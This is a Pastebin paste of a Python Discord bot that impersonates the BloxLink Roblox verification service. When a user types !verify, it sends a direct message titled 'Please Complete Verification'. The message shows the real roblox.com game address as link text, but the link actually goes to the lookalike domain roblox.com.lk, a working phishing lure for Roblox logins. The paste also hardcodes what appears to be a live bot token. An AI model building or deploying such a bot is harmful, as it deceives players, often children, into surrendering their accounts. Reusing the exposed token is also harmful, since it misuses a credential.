Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import discord
- from discord.ext import commands
- intents = discord.Intents.all()
- # Settings (Change these to whatever you want)
- token = "MTI1NzAzMTE0NjE2MDUyMTI0Ng.Gobp55.KTDtaERzpzZiPOEy3WCMxBahMNHrujGj1NUEMk"
- prefix = "!"
- title = "Please Complete Verification"
- desc = "To verify your account, please join BloxLink's Official Roblox Verification Game"
- field = "Please Login and join the game!"
- hyperlink = "https://www.roblox.com/games/1271943503/Bloxlink-Verification-Game"
- fake_link = "https://www.roblox.com.lk/share?code=c74b19fd9d47cd948352199642efa07a&type=Server"
- client = commands.Bot(command_prefix=prefix, intents=intents)
- client.remove_command('help')
- @client.event
- async def on_ready():
- print('')
- print('----------------')
- print('Bloxlink is Online!')
- print('----------------')
- main = discord.Embed(title=title, description=desc, color=0xcf4948)
- main.add_field(name=field, value=f"[{hyperlink}]({fake_link})")
- main.set_thumbnail(url='https://avatars.githubusercontent.com/u/39774496?s=200&v=4')
- @client.command()
- async def verify(ctx):
- await ctx.send('Sent Verification Link! Please Check DMs')
- await ctx.author.send(embed=main)
- client.run(token)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement